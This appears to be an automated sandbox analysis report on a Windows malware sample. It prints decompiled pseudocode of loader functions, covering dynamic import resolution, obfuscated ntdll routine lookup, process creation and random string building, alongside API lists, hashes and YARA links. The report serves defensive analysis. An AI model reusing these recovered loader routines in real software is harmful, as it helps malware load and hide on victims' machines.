                                                          • HeapFree.KERNEL32(00000000,?), ref: 04634BA6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04634BD4
                                                          • GetTickCount.KERNEL32 ref: 04634BE5
                                                          • RtlEnterCriticalSection.NTDLL(04EC9570), ref: 04634BF9
                                                          • RtlLeaveCriticalSection.NTDLL(04EC9570), ref: 04634C17
                                                            • Part of subcall function 04631BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,046320C2,?,04EC95B0), ref: 04631BE1
                                                            • Part of subcall function 04631BB6: lstrlen.KERNEL32(?,?,?,046320C2,?,04EC95B0), ref: 04631BE9
                                                            • Part of subcall function 04631BB6: strcpy.NTDLL ref: 04631C00
                                                            • Part of subcall function 04631BB6: lstrcat.KERNEL32(00000000,?), ref: 04631C0B
                                                            • Part of subcall function 04631BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,046320C2,?,04EC95B0), ref: 04631C28
                                                          • StrTrimA.SHLWAPI(00000000,0463C28C,?,04EC95B0), ref: 04634C4E
                                                            • Part of subcall function 0463361A: lstrlen.KERNEL32(04EC9A78,00000000,00000000,7742C740,046320ED,00000000), ref: 0463362A
                                                            • Part of subcall function 0463361A: lstrlen.KERNEL32(?), ref: 04633632
                                                            • Part of subcall function 0463361A: lstrcpy.KERNEL32(00000000,04EC9A78), ref: 04633646
                                                            • Part of subcall function 0463361A: lstrcat.KERNEL32(00000000,?), ref: 04633651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04634C6F
                                                          • lstrcpy.KERNEL32(?,?), ref: 04634C77
                                                          • lstrcat.KERNEL32(?,?), ref: 04634C85
                                                          • lstrcat.KERNEL32(?,00000000), ref: 04634C8B
                                                            • Part of subcall function 04639070: lstrlen.KERNEL32(?,00000000,04EC9A98,00000000,04638808,04EC9C76,?,?,?,?,?,63699BC3,00000005,0463D00C), ref: 04639077
                                                            • Part of subcall function 04639070: mbstowcs.NTDLL ref: 046390A0
                                                            • Part of subcall function 04639070: memset.NTDLL ref: 046390B2
                                                          • wcstombs.NTDLL ref: 04634D1C
                                                            • Part of subcall function 0463391F: SysAllocString.OLEAUT32(?), ref: 0463395A
                                                            • Part of subcall function 0463A734: HeapFree.KERNEL32(00000000,00000000,04635637,00000000,?,?,00000000), ref: 0463A740
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04634D5D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04634D69
                                                          • HeapFree.KERNEL32(00000000,?,?,04EC95B0), ref: 04634D75
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04634D81
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04634D8D
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                          • String ID:
                                                          • API String ID: 3748877296-0
                                                          • Opcode ID: e2873744ec45c66b1aa78f32ee0737518a9d64fd259a12d7c790f695815719d3
                                                          • Instruction ID: 2165f5fb930adfbc3128a1573e465f2c4130a5f71be1a8a0416827f74bab1ec9
                                                          • Opcode Fuzzy Hash: e2873744ec45c66b1aa78f32ee0737518a9d64fd259a12d7c790f695815719d3
                                                          • Instruction Fuzzy Hash: 01915971900188BFDB11DFA4DC88AAEBBB9EF09316F144055F905E7260EB39ED51DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0463AC55, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 51%
                                                          			E0463AC55(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4630000;
				_t115 = _t139[3] + 0x4630000;
				_t131 = _t139[4] + 0x4630000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4630000;
				_v16 = _t139[5] + 0x4630000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4630002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x463d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x463d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x463d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x463d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x463d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x463d198; // 0x0
										 *_t102 = _t125;
										 *0x463d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x463d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

































                                                          0x0463ac64
                                                          0x0463ac7a
                                                          0x0463ac80
                                                          0x0463ac82
                                                          0x0463ac87
                                                          0x0463ac8d
                                                          0x0463ac92
                                                          0x0463ac95
                                                          0x0463aca3
                                                          0x0463acaa
                                                          0x0463acad
                                                          0x0463acb0
                                                          0x0463acb1
                                                          0x0463acb4
                                                          0x0463acb7
                                                          0x0463acba
                                                          0x0463acbf
                                                          0x0463acce
                                                          0x00000000
                                                          0x0463acd4
                                                          0x0463acde
                                                          0x0463ace8
                                                          0x0463aced
                                                          0x0463acef
                                                          0x0463acf9
                                                          0x0463acfc
                                                          0x0463acff
                                                          0x0463ad05
                                                          0x0463ad07
                                                          0x0463ad07
                                                          0x0463ad0a
                                                          0x0463ad0d
                                                          0x0463ad12
                                                          0x0463ad16
                                                          0x0463ad29
                                                          0x0463ad2b
                                                          0x0463add3
                                                          0x0463add3
                                                          0x0463adda
                                                          0x0463addd
                                                          0x0463ade7
                                                          0x0463ade7
                                                          0x0463adeb
                                                          0x0463ae69
                                                          0x0463ae6c
                                                          0x0463ae6e
                                                          0x0463ae6e
                                                          0x0463ae75
                                                          0x0463ae77
                                                          0x0463ae81
                                                          0x0463ae84
                                                          0x0463ae87
                                                          0x0463ae87
                                                          0x00000000
                                                          0x0463aded
                                                          0x0463adf0
                                                          0x0463ae1e
                                                          0x0463ae28
                                                          0x0463ae2c
                                                          0x0463ae34
                                                          0x0463ae37
                                                          0x0463ae3e
                                                          0x0463ae48
                                                          0x0463ae48
                                                          0x0463ae4c
                                                          0x0463ae51
                                                          0x0463ae60
                                                          0x0463ae66
                                                          0x0463ae66
                                                          0x0463ae4c
                                                          0x00000000
                                                          0x0463adf7
                                                          0x0463adfa
                                                          0x0463ae02
                                                          0x0463ae17
                                                          0x0463ae1c
                                                          0x00000000
                                                          0x00000000
                                                          0x0463ae1c
                                                          0x00000000
                                                          0x0463ae02
                                                          0x0463adf0
                                                          0x0463adeb
                                                          0x0463ad31
                                                          0x0463ad38
                                                          0x0463ad48
                                                          0x0463ad51
                                                          0x0463ad55
                                                          0x0463ad98
                                                          0x0463ada4
                                                          0x0463adcd
                                                          0x0463ada6
                                                          0x0463adaa
                                                          0x0463adb0
                                                          0x0463adb8
                                                          0x0463adba
                                                          0x0463adbd
                                                          0x0463adc3
                                                          0x0463adc5
                                                          0x0463adc5
                                                          0x0463adb8
                                                          0x0463adaa
                                                          0x00000000
                                                          0x0463ada4
                                                          0x0463ad5d
                                                          0x0463ad60
                                                          0x0463ad67
                                                          0x0463ad77
                                                          0x0463ad7a
                                                          0x0463ad8a
                                                          0x00000000
                                                          0x0463ad90
                                                          0x0463ad71
                                                          0x0463ad75
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0463ad75
                                                          0x0463ad42
                                                          0x0463ad46
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0463ad46
                                                          0x0463ad1f
                                                          0x0463ad23
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0463ACCE
                                                          • LoadLibraryA.KERNEL32(?), ref: 0463AD4B
                                                          • GetLastError.KERNEL32 ref: 0463AD57
                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0463AD8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                          • String ID: $
                                                          • API String ID: 948315288-3993045852
                                                          • Opcode ID: a96eef207d19f6650ff6e34db79a9820f9cf3f1bd6322f7acdbca10d005d3de2
                                                          • Instruction ID: 2abc84edd6866310482294f61ea52b4b829453797bf31651d8fc67c0f74554fc
                                                          • Opcode Fuzzy Hash: a96eef207d19f6650ff6e34db79a9820f9cf3f1bd6322f7acdbca10d005d3de2
                                                          • Instruction Fuzzy Hash: 1F812A75A00285AFDB10CFA8D984AAEB7F5EF58712F14802AE945E7340F7B4F905DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04636C38, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 27%
                                                          			E04636C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x463d33c; // 0x4ec9798
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E0463A557(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x463c18c;
				}
				_t46 = E046318A5(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E0463A71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x463d2a8; // 0x88a5a8
						_t16 = _t75 + 0x463eb08; // 0x530025
						 *0x463d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E0463A557(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x463c190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E0463A71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E0463A734(_v20);
						} else {
							_t66 =  *0x463d2a8; // 0x88a5a8
							_t31 = _t66 + 0x463ec28; // 0x73006d
							 *0x463d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E0463A734(_v12);
				}
				return _v24;
			}




























                                                          0x04636c40
                                                          0x04636c46
                                                          0x04636c4d
                                                          0x04636c53
                                                          0x04636c57
                                                          0x04636c5b
                                                          0x04636c5e
                                                          0x04636c63
                                                          0x04636c68
                                                          0x04636c6a
                                                          0x04636c6a
                                                          0x04636c73
                                                          0x04636c78
                                                          0x04636c7d
                                                          0x04636c83
                                                          0x04636c8d
                                                          0x04636c96
                                                          0x04636c9d
                                                          0x04636cb6
                                                          0x04636cbb
                                                          0x04636cc0
                                                          0x04636cc9
                                                          0x04636cd2
                                                          0x04636ce3
                                                          0x04636cec
                                                          0x04636cf0
                                                          0x04636cf4
                                                          0x04636cf9
                                                          0x04636cfe
                                                          0x04636d00
                                                          0x04636d00
                                                          0x04636d0a
                                                          0x04636d13
                                                          0x04636d1a
                                                          0x04636d32
                                                          0x04636d36
                                                          0x04636d73
                                                          0x04636d38
                                                          0x04636d3b
                                                          0x04636d43
                                                          0x04636d54
                                                          0x04636d60
                                                          0x04636d68
                                                          0x04636d6c
                                                          0x04636d6c
                                                          0x04636d36
                                                          0x04636d7b
                                                          0x04636d80
                                                          0x04636d87

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04636C4D
                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 04636C8D
                                                          • lstrlen.KERNEL32(00000000), ref: 04636C96
                                                          • lstrlen.KERNEL32(00000000), ref: 04636C9D
                                                          • lstrlenW.KERNEL32(80000002), ref: 04636CAA
                                                          • lstrlen.KERNEL32(?,00000004), ref: 04636D0A
                                                          • lstrlen.KERNEL32(?), ref: 04636D13
                                                          • lstrlen.KERNEL32(?), ref: 04636D1A
                                                          • lstrlenW.KERNEL32(?), ref: 04636D21
                                                            • Part of subcall function 0463A734: HeapFree.KERNEL32(00000000,00000000,04635637,00000000,?,?,00000000), ref: 0463A740
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 2535036572-0
                                                          • Opcode ID: 29ca1d05a3f4c97ac886cd0c985c795a8be51bf59655852e3d2b8d710b981480
                                                          • Instruction ID: 8ab49f43d24413f3b6438da92f440c81240366679a456331fe589896b407a2a9
                                                          • Opcode Fuzzy Hash: 29ca1d05a3f4c97ac886cd0c985c795a8be51bf59655852e3d2b8d710b981480
                                                          • Instruction Fuzzy Hash: E9415B76900289FBDF11AFA4CC489DE7BB5EF44319F054055E904A7210EB35EE50EB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04638EA1, Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 73%
                                                          			E04638EA1(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E0463592D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E0463A749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x463d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x463d2a8; // 0x88a5a8
					_t18 = _t47 + 0x463e3e6; // 0x73797325
					_t68 = E04633C48(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x463d2a8; // 0x88a5a8
						_t19 = _t50 + 0x463e747; // 0x4ec8cef
						_t20 = _t50 + 0x463e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E0463A62D();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E0463A62D();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x463d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E0463A734(_t70);
				goto L12;
			}


















                                                          0x04638ea9
                                                          0x04638ea9
                                                          0x04638eb8
                                                          0x04638ebf
                                                          0x04638ec4
                                                          0x04638fd1
                                                          0x04638fd8
                                                          0x04638fd8
                                                          0x04638ed3
                                                          0x04638edb
                                                          0x04638ede
                                                          0x04638ee3
                                                          0x04638ef8
                                                          0x04638efe
                                                          0x04638eff
                                                          0x04638f02
                                                          0x04638f08
                                                          0x04638f0b
                                                          0x04638f10
                                                          0x04638f18
                                                          0x04638f24
                                                          0x04638f28
                                                          0x04638fb8
                                                          0x04638f2e
                                                          0x04638f2e
                                                          0x04638f33
                                                          0x04638f3a
                                                          0x04638f4e
                                                          0x04638f52
                                                          0x04638fa1
                                                          0x04638f54
                                                          0x04638f55
                                                          0x04638f5c
                                                          0x04638f75
                                                          0x04638f77
                                                          0x04638f7b
                                                          0x04638f82
                                                          0x04638f9c
                                                          0x04638f84
                                                          0x04638f8d
                                                          0x04638f92
                                                          0x04638f92
                                                          0x04638f82
                                                          0x04638fb0
                                                          0x04638fb0
                                                          0x04638f28
                                                          0x04638fbf
                                                          0x04638fc8
                                                          0x04638fcc
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 0463592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04638EBD,?,00000001,?,?,00000000,00000000), ref: 04635952
                                                            • Part of subcall function 0463592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04635974
                                                            • Part of subcall function 0463592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0463598A
                                                            • Part of subcall function 0463592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 046359A0
                                                            • Part of subcall function 0463592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 046359B6
                                                            • Part of subcall function 0463592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 046359CC
                                                          • memset.NTDLL ref: 04638F0B
                                                            • Part of subcall function 04633C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04638F24,73797325), ref: 04633C59
                                                            • Part of subcall function 04633C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04633C73
                                                          • GetModuleHandleA.KERNEL32(4E52454B,04EC8CEF,73797325), ref: 04638F41
                                                          • GetProcAddress.KERNEL32(00000000), ref: 04638F48
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04638FB0
                                                            • Part of subcall function 0463A62D: GetProcAddress.KERNEL32(36776F57,0463A2D4), ref: 0463A648
                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04638F8D
                                                          • CloseHandle.KERNEL32(?), ref: 04638F92
                                                          • GetLastError.KERNEL32(00000001), ref: 04638F96
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                          • String ID:
                                                          • API String ID: 3075724336-0
                                                          • Opcode ID: a42151b9ecac807105a3e866c105cd7ab0ca8a1f8ddf72975c4671669bc6a26a
                                                          • Instruction ID: 791866ec150442323928112cf449c50c39e7c127f8dd49225607a29a3d505884
                                                          • Opcode Fuzzy Hash: a42151b9ecac807105a3e866c105cd7ab0ca8a1f8ddf72975c4671669bc6a26a
                                                          • Instruction Fuzzy Hash: B83130B6900288BFDB11AFE4CC88DDEBBBDEB04346F004469F606A7210E735AD45DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04631BB6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 63%
                                                          			E04631BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x463d2a8; // 0x88a5a8
				_t1 = _t9 + 0x463e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E0463173D(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E0463A71F(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E046364EF(_t34, _t41, _a8);
						E0463A734(_t41);
						_t42 = E04636467(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E0463A734(_t36);
							_t36 = _t42;
						}
						_t43 = E046317E5(_t36, _t33);
						if(_t43 != 0) {
							E0463A734(_t36);
							_t36 = _t43;
						}
					}
					E0463A734(_t28);
				}
				return _t36;
			}














                                                          0x04631bb6
                                                          0x04631bb9
                                                          0x04631bba
                                                          0x04631bc2
                                                          0x04631bc9
                                                          0x04631bd0
                                                          0x04631bd4
                                                          0x04631bda
                                                          0x04631be1
                                                          0x04631be6
                                                          0x04631bf8
                                                          0x04631bfc
                                                          0x04631c00
                                                          0x04631c06
                                                          0x04631c0b
                                                          0x04631c1b
                                                          0x04631c1d
                                                          0x04631c34
                                                          0x04631c38
                                                          0x04631c3b
                                                          0x04631c40
                                                          0x04631c40
                                                          0x04631c49
                                                          0x04631c4d
                                                          0x04631c50
                                                          0x04631c55
                                                          0x04631c55
                                                          0x04631c4d
                                                          0x04631c58
                                                          0x04631c58
                                                          0x04631c63

                                                          APIs
                                                            • Part of subcall function 0463173D: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,04631BD0,253D7325,00000000,00000000,7742C740,?,?,046320C2,?), ref: 046317A4
                                                            • Part of subcall function 0463173D: sprintf.NTDLL ref: 046317C5
                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,046320C2,?,04EC95B0), ref: 04631BE1
                                                          • lstrlen.KERNEL32(?,?,?,046320C2,?,04EC95B0), ref: 04631BE9
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • strcpy.NTDLL ref: 04631C00
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04631C0B
                                                            • Part of subcall function 046364EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04631C1A,00000000,?,?,?,046320C2,?,04EC95B0), ref: 04636506
                                                            • Part of subcall function 0463A734: HeapFree.KERNEL32(00000000,00000000,04635637,00000000,?,?,00000000), ref: 0463A740
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,046320C2,?,04EC95B0), ref: 04631C28
                                                            • Part of subcall function 04636467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04631C34,00000000,?,?,046320C2,?,04EC95B0), ref: 04636471
                                                            • Part of subcall function 04636467: _snprintf.NTDLL ref: 046364CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 984ac3b2df51d01697e6b02968c0e96880bf6e485d42ff29e84f513b5a64103f
                                                          • Instruction ID: bfd9914ba8e3a326d36416e04873ce140381c3e727e3431b46c9b99b3f84a2b4
                                                          • Opcode Fuzzy Hash: 984ac3b2df51d01697e6b02968c0e96880bf6e485d42ff29e84f513b5a64103f
                                                          • Instruction Fuzzy Hash: FF11067B9012E4779712B7F48C84CAE36BDCE56A5B3054019FA00A7200FE38EC0297E4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04636891, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(00000000), ref: 046368EB
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 046368FF
                                                          • SysAllocString.OLEAUT32(00000000), ref: 04636911
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04636979
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04636988
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04636993
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
